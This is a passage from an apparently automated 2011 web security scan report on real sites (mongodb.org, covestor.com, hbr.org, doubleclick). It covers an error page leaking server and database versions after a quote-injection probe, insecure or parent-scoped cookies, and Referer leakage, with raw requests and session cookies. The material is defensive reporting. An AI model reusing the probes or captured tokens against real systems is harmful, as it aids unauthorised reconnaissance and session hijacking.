GET /s/1627/3/1.0/_/download/batch%27/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css?media=print HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.6.10.1320843794; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02; rack.session=BAh7AA%3D%3D%0A; __utmc=266042259
Response 2
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 09 Nov 2011 13:19:42 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... <p>Unknown</p> <h3>Confluence Application Information</h3> <h4>Build Information</h4> <p> home: /opt/j2ee/domains/onconfluence.com/mongodb/webapps/atlassian-confluence/data/current<br> buildNumber: 1627<br> upTime: 1 day, 41 minutes, 26 seconds<br> devMode: false<br> version: 3.0.0_01<br> Unique ID: 0x00000133887BEA7543DDE99574A5331FF8531E6A21C6AD9DCB79E5422EB2F1C6 </p> <h4>Server information</h4> <p> Application Server: Apache Tomcat/5.5.20<br> Servlet Version: 2.4<br> Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br> Database Driver Name: null<br> Database Driver Version: 8.3<br> Database Name: PostgreSQL<br> Database Version: 8.3.7<br> Database Transaction Isolation: Read committed Database Latency: 0<br> </p> <h4>Memory Information</h4> <p> Total Memory: 986 MB<br> Used Memory: 720 MB<br> Free Memory: 266 MB<br> </p> <h4>System Information</h4> <p> favouriteColour: Lemon chiffon<br> javaRuntime: Java(TM) SE Runtime Environment<br> jvmVersion: 1.0<br> operatingSystem: Linux 2.6.18-128.1.6.el5<br> fileSystemEncoding: ANSI_X3.4-1968<br> javaVm: Java HotSpot(TM) 64-Bit Server VM<br> javaVendor: Sun Microsystems Inc.<br> userTimezone: America/New_York<br> jvmImplementationVersion: 10.0-b23<br> appServer: Apache Tomcat<br> ...[SNIP]...
10. SSL cookie without secure flag set
previous
next
There are 2 instances of this issue:
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
10.1. https://account.covestor.com/mirroring-account/join-trial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://account.covestor.com
Path:
/mirroring-account/join-trial
Issue detail
The following cookie was issued by the application and does not have the secure flag set:C1320846063712=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:46:02 GMT;path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mirroring-account/join-trial HTTP/1.1 Host: account.covestor.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://covestor.com/ Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:41:03 GMT Server: COVESTOR Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:41:03 GMT;path=/Set-Cookie: C1320846063712=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:46:02 GMT;path=/ Expires: Wed, 09 Nov 2011 13:41:03 GMT Vary: Accept-Encoding Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 24468 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- start head:me...[SNIP]...
10.2. https://account.covestor.com/mirroring-account/join-trial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://account.covestor.com
Path:
/mirroring-account/join-trial
Issue detail
The following cookie was issued by the application and does not have the secure flag set:C1320846290554=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:49:49 GMT;path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /mirroring-account/join-trial HTTP/1.1 Host: account.covestor.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://account.covestor.com/mirroring-account/join-trial Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; C1320846063250=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial Content-Type: application/x-www-form-urlencoded Content-Length: 89 email=&emailconfirm=&password=&fname=&lname=&phone=&terms=1&action=1&=Activate+Free+Trial
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:44:50 GMT Server: COVESTOR Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:44:50 GMT;path=/Set-Cookie: C1320846290554=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:49:49 GMT;path=/ Expires: Wed, 09 Nov 2011 13:44:50 GMT Vary: Accept-Encoding Keep-Alive: timeout=15, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 24770 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- start head:me...[SNIP]...
11. Cookie scoped to parent domain
previous
next
There are 2 instances of this issue:
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
11.1. https://account.covestor.com/mirroring-account/join-trial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://account.covestor.com
Path:
/mirroring-account/join-trial
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:C1320846063712=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:46:02 GMT;path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mirroring-account/join-trial HTTP/1.1 Host: account.covestor.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://covestor.com/ Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:41:03 GMT Server: COVESTOR Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:41:03 GMT;path=/Set-Cookie: C1320846063712=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:46:02 GMT;path=/ Expires: Wed, 09 Nov 2011 13:41:03 GMT Vary: Accept-Encoding Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 24468 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- start head:me...[SNIP]...
11.2. https://account.covestor.com/mirroring-account/join-trial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://account.covestor.com
Path:
/mirroring-account/join-trial
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:C1320846290554=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:49:49 GMT;path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /mirroring-account/join-trial HTTP/1.1 Host: account.covestor.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://account.covestor.com/mirroring-account/join-trial Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; C1320846063250=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial Content-Type: application/x-www-form-urlencoded Content-Length: 89 email=&emailconfirm=&password=&fname=&lname=&phone=&terms=1&action=1&=Activate+Free+Trial
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:44:50 GMT Server: COVESTOR Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:44:50 GMT;path=/Set-Cookie: C1320846290554=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:49:49 GMT;path=/ Expires: Wed, 09 Nov 2011 13:44:50 GMT Vary: Accept-Encoding Keep-Alive: timeout=15, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 24770 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- start head:me...[SNIP]...
12. Cross-domain Referer leakage
previous
next
There are 5 instances of this issue:
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form. If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise. You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application. Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure. Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
12.1. http://cm.g.doubleclick.net/pixel
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://cm.g.doubleclick.net
Path:
/pixel
Issue detail
The page was loaded from a URL containing a query string:http://cm.g.doubleclick.net/pixel?google_nid=B765081F39B1F7&google_cm&google_sc The response contains the following link to another domain:http://cms.quantserve.com/dpixel?eid=0&id=&google_gid=CAESEBoO8rDuQMKCstxVfgo3pL4&google_cver=1
Request
GET /pixel?google_nid=B765081F39B1F7&google_cm&google_sc HTTP/1.1 Host: cm.g.doubleclick.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://canv.as/x/abstract/top/2011 Cookie: id=22bc9c0c4801009e||t=1320629868|et=730|cs=002213fd48cb0cf34a9821d52f
Response
HTTP/1.1 302 Found Location: http://cms.quantserve.com/dpixel?eid=0&id=&google_gid=CAESEBoO8rDuQMKCstxVfgo3pL4&google_cver=1 Cache-Control: no-store, no-cache Pragma: no-cache Date: Wed, 09 Nov 2011 13:21:17 GMT Content-Type: text/html; charset=UTF-8 Server: Cookie Matcher Content-Length: 304 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved<A HREF="http://cms.quantserve.com/dpixel?eid=0&id=&google_gid=CAESEBoO8rDuQMKCstxVfgo3pL4&google_cver=1"> here</A>...[SNIP]...
12.2. http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG
Issue detail
The page was loaded from a URL containing a query string:http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 The response contains the following links to other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js http://edge.quantserve.com/quant.js http://ethnio.com/remotes/19144 http://feeds.harvardbusiness.org/harvardbusiness http://harvardbusiness.org/ http://harvardbusiness.org/about http://harvardbusiness.org/about/copyright-information http://harvardbusiness.org/about/privacy-policy http://harvardbusiness.org/careers http://harvardbusiness.org/newsroom http://harvardbusinessreview.ugc.bazaarvoice.com/static/9072-en_us/bvapi.js http://hbsp.harvard.edu/ http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=152022135 http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=280272386 http://pixel.quantserve.com/pixel/p-6dSQpqwKunJIM.gif http://twitter.com/HarvardBiz http://use.typekit.com/xtw4yuk.js http://ww3.harvardbusiness.org/corporate/ http://www.accelacomm.com/jaw/stayconnected/72/50246540/ http://www.accelacomm.com/jaw/stayconnected/72/50269290/ http://www.exed.hbs.edu/ http://www.facebook.com/HBR http://www.facebook.com/plugins/activity.php?site=hbr.org&width=300&height=300&header=false&colorscheme=light&font=arial&border_color=%23C8C6C7&recommendations=false http://www.google.com/profiles/HarvardBizBuzz http://www.hbs.edu/ http://www.linkedin.com/groups?gid=3044917 http://www.quantcast.com/p-6dSQpqwKunJIM http://www.trademark.harvard.edu/trademark_protection/notice.php http://www.youtube.com/HarvardBusiness https://secure.customersvc.com/servlet/Show?WESPAGE=OrderPages/harvard/ho/0912/order_1701.jsp&MSRSMAG=HR&MSCCMPLX=footer https://secure.customersvc.com/servlet/Show?WESPAGE=OrderPages/harvard/ho/1012/order_0101.jsp&MSRSMAG=HR&MSCCMPLX=rgprompt
Request
GET /product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.navfund.com/resources
Response
HTTP/1.1 200 OK Set-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:17 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 X-Powered-By: JSF/1.2 Set-Cookie: HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; Domain=hbr.org; Expires=Sat, 24-Dec-2011 14:09:17 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Expires: Wed, 09 Nov 2011 14:09:17 GMT LEG: 5 Vary: Accept-Encoding Content-Length: 47236 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea...[SNIP]... <!-- typekit --> <script type="text/javascript" src="//use.typekit.com/xtw4yuk.js"> </script>...[SNIP]... <!-- baynote --> <script type="text/javascript" src="//harvardbusinessreview.ugc.bazaarvoice.com/static/9072-en_us/bvapi.js"> </script>...[SNIP]... <li><a href="http://harvardbusiness.org"> Harvard Business Publishing</a>...[SNIP]... <li><a href="http://hbsp.harvard.edu/"> For Educators</a>...[SNIP]... <li><a href="http://ww3.harvardbusiness.org/corporate/"> For Corporate Buyers</a>...[SNIP]... <li><a href="http://www.hbs.edu/"> Visit Harvard Business School</a>...[SNIP]... <li id="twitterLink"><a href="http://twitter.com/HarvardBiz" title="Twitter"> <span>...[SNIP]... <li id="faceBookLink"><a href="http://www.facebook.com/HBR" title="FaceBook"> <span>...[SNIP]... <li id="linkedInLink"><a href="http://www.linkedin.com/groups?gid=3044917" title="LinkedIn"> <span>...[SNIP]... </strong> at <a href="http://hbsp.harvard.edu"> hbsp.harvard.edu</a>...[SNIP]... </strong> Tell your instructors about the savings at <a href="http://hbsp.harvard.edu"> hbsp.harvard.edu</a>...[SNIP]... </h5><iframe src="http://www.facebook.com/plugins/activity.php?site=hbr.org&width=300&height=300&header=false&colorscheme=light&font=arial&border_color=%23C8C6C7&recommendations=false" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"> </iframe>...[SNIP]... <div class="stay_connected_item_icon"><a href="http://www.facebook.com/HBR"> <img src="/hbrg-main/resources/images/marketing/sc/sc_facebook.png" width="51" height="50" border="0" alt="Facebook" />...[SNIP]... <div class="stay_connected_item_label"><a href="http://www.facebook.com/HBR"> Facebook</a>...[SNIP]... <div class="stay_connected_item_icon"><a href="http://twitter.com/HarvardBiz"> <img src="/hbrg-main/resources/images/marketing/sc/sc_twitter.png" width="51" height="50" border="0" alt="Twitter" />...[SNIP]... <div class="stay_connected_item_label"><a href="http://twitter.com/HarvardBiz"> Twitter</a>...[SNIP]... <div class="stay_connected_item_icon"><a href="http://feeds.harvardbusiness.org/harvardbusiness"> <img src="/hbrg-main/resources/images/marketing/sc/sc_rss.png" width="51" height="50" border="0" alt="RSS" />...[SNIP]... <div class="stay_connected_item_label"><a href="http://feeds.harvardbusiness.org/harvardbusiness"> RSS</a>...[SNIP]... <div class="stay_connected_item_icon"><a href="http://www.linkedin.com/groups?gid=3044917"> <img src="/hbrg-main/resources/images/marketing/sc/sc_linkedin.png" width="51" height="50" border="0" alt="LinkedIn" />...[SNIP]... <div class="stay_connected_item_label"><a href="http://www.linkedin.com/groups?gid=3044917"> LinkedIn</a>...[SNIP]... <div class="stay_connected_item_icon"><a href="http://www.youtube.com/HarvardBusiness"> <img src="/hbrg-main/resources/images/marketing/sc/sc_youtube.png" width="51" height="50" border="0" alt="YouTube" />...[SNIP]... <div class="stay_connected_item_label"><a href="http://www.youtube.com/HarvardBusiness"> YouTube</a>...[SNIP]... <div class="stay_connected_item_icon"><a href="http://www.google.com/profiles/HarvardBizBuzz"> <img src="/hbrg-main/resources/images/marketing/sc/sc_buzz.png" width="51" height="50" border="0" alt="Google" />...[SNIP]... <div class="stay_connected_item_label"><a href="http://www.google.com/profiles/HarvardBizBuzz"> Google</a>...[SNIP]... <li><a href="http://www.accelacomm.com/jaw/stayconnected/72/50269290/"> Management Tip</a>...[SNIP]... <li><a href="http://www.accelacomm.com/jaw/stayconnected/72/50246540/"> The Daily Stat</a>...[SNIP]... <li><a href="https://secure.customersvc.com/servlet/Show?WESPAGE=OrderPages/harvard/ho/0912/order_1701.jsp&MSRSMAG=HR&MSCCMPLX=footer"> Subscribe</a>...[SNIP]... <li><a href="http://feeds.harvardbusiness.org/harvardbusiness"> RSS Feed</a>...[SNIP]... <li><a href="http://twitter.com/HarvardBiz"> HBR on Twitter</a>...[SNIP]... <li><a href="http://www.facebook.com/HBR"> HBR on Facebook</a>...[SNIP]... <li><a href="http://www.youtube.com/HarvardBusiness"> HBR on YouTube</a>...[SNIP]... <li>Podcasts: <a href="http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=152022135"> Audio</a> and <a href="http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=280272386"> Video</a>...[SNIP]... <li><a href="http://harvardbusiness.org/newsroom"> Newsroom</a>...[SNIP]... <li><a href="http://www.hbs.edu/"> Harvard Business School</a>...[SNIP]... <li><a href="http://www.exed.hbs.edu/"> HBS Executive Education</a>...[SNIP]... <h5 id="hbpHeader"><a href="http://harvardbusiness.org/"> Harvard Business Publishing</a>...[SNIP]... <li><a href="http://harvardbusiness.org/about"> About Us</a>...[SNIP]... <li><a href="http://harvardbusiness.org/careers"> Careers</a>...[SNIP]... <li><a href="http://hbsp.harvard.edu/"> Higher Education</a>...[SNIP]... <li><a href="http://ww3.harvardbusiness.org/corporate/"> Corporate Learning</a>...[SNIP]... <div id="subFooterLogo"> <a href="http://harvardbusiness.org/"> <span>...[SNIP]... <li><a href="http://harvardbusiness.org/about"> About Us</a>...[SNIP]... <li><a href="http://harvardbusiness.org/about/privacy-policy"> Privacy Policy</a>...[SNIP]... <li><a href="http://harvardbusiness.org/about/copyright-information"> Copyright Information</a>...[SNIP]... <li><a href="http://www.trademark.harvard.edu/trademark_protection/notice.php"> Trademark Policy</a>...[SNIP]... <li><a href="http://harvardbusiness.org/"> Harvard Business Publishing</a>...[SNIP]... <li><a href="http://hbsp.harvard.edu/"> Higher Education</a>...[SNIP]... <li><a href="http://ww3.harvardbusiness.org/corporate/"> Corporate Learning</a>...[SNIP]... </h6> <a href="https://secure.customersvc.com/servlet/Show?WESPAGE=OrderPages/harvard/ho/1012/order_0101.jsp&MSRSMAG=HR&MSCCMPLX=rgprompt"> Become a paid subscriber »</a>...[SNIP]... </div> <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"> </script> <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js"> </script>...[SNIP]... <!-- Start Quantcast tag --> <script type="text/javascript" src="//edge.quantserve.com/quant.js"> </script>...[SNIP]... <noscript> <a href="//www.quantcast.com/p-6dSQpqwKunJIM" target="_blank"> <img src="//pixel.quantserve.com/pixel/p-6dSQpqwKunJIM.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast" /> </a>...[SNIP]... <!-- usability overlay --> <script language="javascript" src="http://ethnio.com/remotes/19144" type="text/javascript"> </script>...[SNIP]...
12.3. http://www.mongodb.org/dosearchsite.action
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.mongodb.org
Path:
/dosearchsite.action
Issue detail
The page was loaded from a URL containing a query string:http://www.mongodb.org/dosearchsite.action?queryString=sql+stored+proc+trigger+function&where=DOCS The response contains the following links to other domains:http://jira.atlassian.com/secure/BrowseProject.jspa?id=10470 http://www.atlassian.com/about/connected.jsp?s_kwcid=Confluence-stayintouch http://www.atlassian.com/software/confluence
Request
GET /dosearchsite.action?queryString=sql+stored+proc+trigger+function&where=DOCS HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/display/DOCS/Source+Code Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.4.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:03:51 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1320843831011 Vary: User-Agent Content-Type: text/html;charset=UTF-8 Content-Length: 15154 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>Site Search - 10gen Confluence</title> ...[SNIP]... <li class="noprint">Powered by <a href="http://www.atlassian.com/software/confluence" class="smalltext"> Atlassian Confluence</a> 3.0.0_01, the <a href="http://www.atlassian.com/software/confluence" class="smalltext"> Enterprise Wiki</a>...[SNIP]... <li class="noprint"><a href="http://jira.atlassian.com/secure/BrowseProject.jspa?id=10470" class="smalltext"> Bug/feature request</a>...[SNIP]... <li class="noprint"><a href="http://www.atlassian.com/about/connected.jsp?s_kwcid=Confluence-stayintouch" class="smalltext"> Atlassian news</a>...[SNIP]...
